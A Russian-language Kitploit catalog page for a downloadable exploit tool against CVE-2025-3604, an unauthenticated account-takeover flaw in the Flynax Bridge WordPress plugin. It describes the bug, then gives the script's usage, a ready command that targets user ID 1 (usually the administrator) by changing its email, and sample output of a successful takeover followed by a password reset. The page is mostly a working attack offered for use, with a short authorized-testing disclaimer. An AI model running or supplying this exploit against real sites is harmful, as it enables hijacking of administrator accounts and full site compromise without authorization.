Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - Неаутентифицированное повышение привилегий через захват учётной записи | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-3604
Аутентификация и авторизацияПовышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - Неаутентифицированное повышение привилегий через захват учётной записи

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 Flynax Bridge <= 2.2.0 - Неаутентифицированное повышение привилегий через захват учётной записи

📄 Описание

Плагин Flynax Bridge для WordPress уязвим к повышению привилегий через захват учётной записи во всех версиях вплоть до 2.2.0 включительно.

Это связано с тем, что плагин не проверяет должным образом личность пользователя перед обновлением данных его учётной записи (например, электронной почты). В результате неаутентифицированные злоумышленники могут изменить адрес электронной почты любого пользователя, включая администраторов, а затем инициировать сброс пароля, чтобы полностью захватить учётную запись.

CVE: CVE-2025-3604
CVSS: 9.8 (Critical)
Опубликовано: 23 апреля 2025 г.
Обновлено: 24 апреля 2025 г.


⚙️ Пример вывода скрипта

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

После успешной эксплуатации злоумышленник может перейти на страницу входа WordPress и нажать «Lost your password?», используя новую электронную почту, чтобы сбросить пароль и получить полный доступ к целевой учётной записи.


🚀 Использование

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 Пример

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

Пояснение:

  • -u: Базовый URL сайта WordPress.
  • -id: ID целевого пользователя (обычно 1 для администратора).
  • -mail: Новая электронная почта, которая будет установлена для этого пользователя.

⚠️ Отказ от ответственности

Используйте на свой страх и риск. Только для авторизованного тестирования и образовательных целей.

🧑‍💻

BY: Nxploited ( Khaled_alenazi )

Скачать инструмент